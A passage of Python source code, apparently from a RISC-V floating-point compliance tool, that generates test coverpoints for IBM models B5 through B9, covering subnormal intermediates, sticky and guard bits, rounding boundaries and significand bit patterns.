cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B5 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b6(flen, opcode, ops, seed=-1):
'''
IBM Model B6 Definition:
This model tests intermediate results in the space between –MinSubNorm and
+MinSubNorm. For each of the following ranges, we select 8 random test cases,
one for every combination of the LSB, guard bit, and sticky bit.
1. -MinSubNorm < intermediate < -MinSubNorm / 2
2. -MinSubNorm / 2 <= intermediate < 0
3. 0 < intermediate <= +MinSubNorm / 2
4. +MinSubNorm / 2 < intermediate < +MinSubNorm
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [Random number ∈ (-MinSubNorm, -MinSubNorm/2), Random number ∈ (-MinSubNorm/2, 0), Random number ∈ (0, +MinSubNorm/2), Random number ∈ (+MinSubNorm/2, +MinSubNorm)]
{All 8 combinations of guard, round and sticky bit are tested for every number}
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fmul':
random.seed(0)
elif opcode in 'fdiv':
random.seed(1)
elif opcode in 'fmadd':
random.seed(2)
elif opcode in 'fnmadd':
random.seed(3)
elif opcode in 'fmsub':
random.seed(4)
elif opcode in 'fnmsub':
random.seed(5)
else:
random.seed(seed)
if flen == 32:
ir_dataset = []
ieee754_minsubnorm_n = '-0x0.000001p-127'
minnum = float.fromhex(ieee754_minsubnorm_n)
r=str(random.uniform(minnum,minnum/2))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
r=str(random.uniform(minnum/2,0))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
r=str(random.uniform(0,abs(minnum/2)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
r=str(random.uniform(abs(minnum/2),abs(minnum)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
elif flen == 64:
ir_dataset = []
ieee754_minsubnorm_n = '-0x0.0000000000001p-1022'
minnum = float.fromhex(ieee754_minsubnorm_n)
r=str("{:.2e}".format(random.uniform(minnum,minnum/2)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
r=str("{:.2e}".format(random.uniform(minnum/2,0)))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
r=str("{:.2e}".format(random.uniform(0,abs(minnum/2))))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
r=str("{:.2e}".format(random.uniform(abs(minnum/2),abs(minnum))))
for i in range(2,16,2):
grs = '{:04b}'.format(i)
ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
b6_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(0,1e-30)
rs3 = random.uniform(0,1e-30)
if opcode in 'fmul':
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fmul','fdiv']:
b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b6_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
#print(*b6_comb,sep='\n')
coverpoints = []
k=0
for c in b6_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B6 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b7(flen, opcode, ops, seed=-1):
'''
IBM Model B7 Definition:
This model checks that the sticky bit is calculated correctly in each of the following cases (for every possible combination in the table). The Guard bit should always be 0, and the sign positive, so that miscalculation of the sticky bit will alter the final result.
Mask in Extra bits
.. code-block::
1000...000
0100...000
…
0000...010
0000...001
0000000000
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [ieee754_maxnorm, maxnum, maxdec, maxnum]
{It assures the calculation of sticky bit for every possible combination in the table}
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The Sticky bit is calculated in each case. The guard bit here is always assumed to be zero and the sign is positive, so that miscalculation of the sticky bit will alter the final result.
- In the intermediate result dataset, the elements are appended as elements before the character ‘p’ and then the binary equivalent of ‘010’ + pow(2,i).
- Finally on the extra bits, it is masked with the comment created in the previous point. All the first character of each element is converted to its floating point equivalent in a loop
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
for i in fsubnorm+fnorm:
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(0,20):
comment = (20-i)*'0' + '1' + i*'0'
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+'{:021b}'.format(pow(2,i)),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Mask on extra bits ---> ' + comment])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
for i in dsubnorm+dnorm:
float_val = fields_dec_converter(64,i)
if float_val > 0:
ieee754_num.append(str(float_val))
ir_dataset = []
for l in range(len(ieee754_num)):
for k in range(1,13):
for i in range(4):
comment = (k*(i+1))*'0' + '1' + (51-(k*(i+1)))*'0'
ir_dataset.append([str(Decimal(ieee754_num[l].split('e')[0])+Decimal(pow(16,-14))+Decimal(pow(pow(2,3-i)*16,-14-k)))+'e'+ieee754_num[l].split('e')[1],' | Mask on extra bits ---> ' + comment])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b7_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
rs3 = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b7_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b7_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k = 0
for c in b7_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 3'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B7 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b8(flen, opcode, ops, seed=-1):
'''
IBM Model B8 Definition:
This model targets numbers that are on the edge of a rounding boundary. These boundaries may vary depending on the rounding mode. These numbers include floating-point numbers and midpoints between floating-point numbers. In order to target the vicinity of these numbers, we test the following constraints on the extra bits of the intermediate result:
1. All values of extra-bits in the range [000...00001, 000...00011]
2. All values of extra-bits in the range [111...11100, 111...11111]
For each value selected above, test all the combinations on the LSB of the significand, the guard bit, and the sticky bit (if the number of extra bits is not finite).
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Results = [For every Subnormal and Normal number, 8 combinations of guard, round and sticky bit are appended, along with 6 combinations(3 positive, 3 negative) of the mask on extra bits]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The intermediate results dataset is populated in accordance with the abstract dataset defined above. The coverpoints can be increased by increasing the dataset of normal and subnormal numbers.
- Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
- These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 60
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
for i in fsubnorm+fnorm:
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ir_dataset = []
# print(*ieee754_num, sep = '\n')
for k in range(len(ieee754_num)):
for i in range(1,4):
for j in range(1,8):
grs = '{:03b}'.format(j)
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('{:03b}'.format(j)+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
for i in dsubnorm+dnorm:
float_val = float.hex(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:17]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(1,4):
for j in range(1,8):
grs = '{:03b}'.format(j)
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'0'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'0'+'{:02b}'.format(i)])
ir_dataset.append([ieee754_num[k].split('p')[0]+hex(int('010'+19*'1'+'{:02b}'.format(i),2))[2:]+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Mask On Extra Bits: '+19*'1'+'{:02b}'.format(i)])
n = len(ir_dataset)
for i in range(n):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
elif opcode in 'fmul':
random.seed(2)
elif opcode in 'fdiv':
random.seed(3)
elif opcode in 'fsqrt':
random.seed(4)
elif opcode in 'fmadd':
random.seed(5)
elif opcode in 'fnmadd':
random.seed(6)
elif opcode in 'fmsub':
random.seed(7)
elif opcode in 'fnmsub':
random.seed(8)
else:
random.seed(seed)
b8_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,ir_dataset[i][0])
rs3 = random.uniform(1,ir_dataset[i][0])
if opcode in 'fadd':
if flen == 32:
rs2 = ir_dataset[i][0] - rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
elif opcode in 'fmul':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
elif opcode in 'fdiv':
if flen == 32:
rs2 = rs1/ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
elif opcode in 'fsqrt':
if flen == 32:
rs2 = ir_dataset[i][0]*ir_dataset[i][0]
elif flen == 64:
rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
elif opcode in 'fmadd':
if flen == 32:
rs2 = (ir_dataset[i][0] - rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmadd':
if flen == 32:
rs2 = (rs3 - ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
elif opcode in 'fmsub':
if flen == 32:
rs2 = (ir_dataset[i][0] + rs3)/rs1
elif flen == 64:
rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
elif opcode in 'fnmsub':
if flen == 32:
rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
elif flen == 64:
rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
x3 = struct.unpack('f', struct.pack('f', rs3))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
x3 = rs3
if opcode in ['fadd','fsub','fmul','fdiv']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
elif opcode in 'fsqrt':
b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
k=0
for c in b8_comb:
for rm in range(5):
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '+str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += ir_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B8 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b9(flen, opcode, ops):
'''
IBM Model B9 Definition:
This model tests special patterns in the significands of the input operands. Each
of the input operands should contain one of the following patterns (each
sequence can be of length 0 up to the number of bits in the significand – the
more interesting cases will be chosen).
1. A sequence of leading zeroes
2. A sequence of leading ones
3. A sequence of trailing zeroes
4. A sequence of trailing ones
5. A small number of 1s as compared to 0s
6. A small number of 0s as compared to 1s
7. A "checkerboard" pattern (for example 00110011... or 011011011...)
8. Long sequences of 1s
9. Long sequences of 0s
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand1, Operand2 ∈ [A sequence of leading zeroes, A sequence of leading ones, A sequence of trailing zeroes, A sequence of trailing ones, A small number of 1s as compared to 0s, A small number of 0s as compared to 1s, A "checkerboard" pattern (for example 00110011... or 011011011...), Long sequences of 1s, Long sequences of 0s]
Implementation:
- The rs1 array is appended with the elements of flip types and then for each iteration, the respective sign, mantissa and exponent is computed.
- A nested loop is initialized, assuming the rs1 mantissa as the base number and rs2 sign and rs2 exponent is obtained directly from the rs1 sign and rs1 exponent. Rs2 mantissa is calculated by adding the iteration number in the beginning of rs1 mantissa. This is done respectively for each repeating pattern.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
rs1 = []
b9_comb = []
comment = []
if ops == 2:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Leading zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Leading ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Trailing zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Trailing ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Long sequence of ones ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b9_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
else:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if rs1_sgn != '1':
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Trailing ones ---> rs1_man = '+rs2_man)
rs1_sgn = '0'
for j in range(flen-e_sz-1-math.ceil(0.1*(flen-e_sz-1)), flen-e_sz-1):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
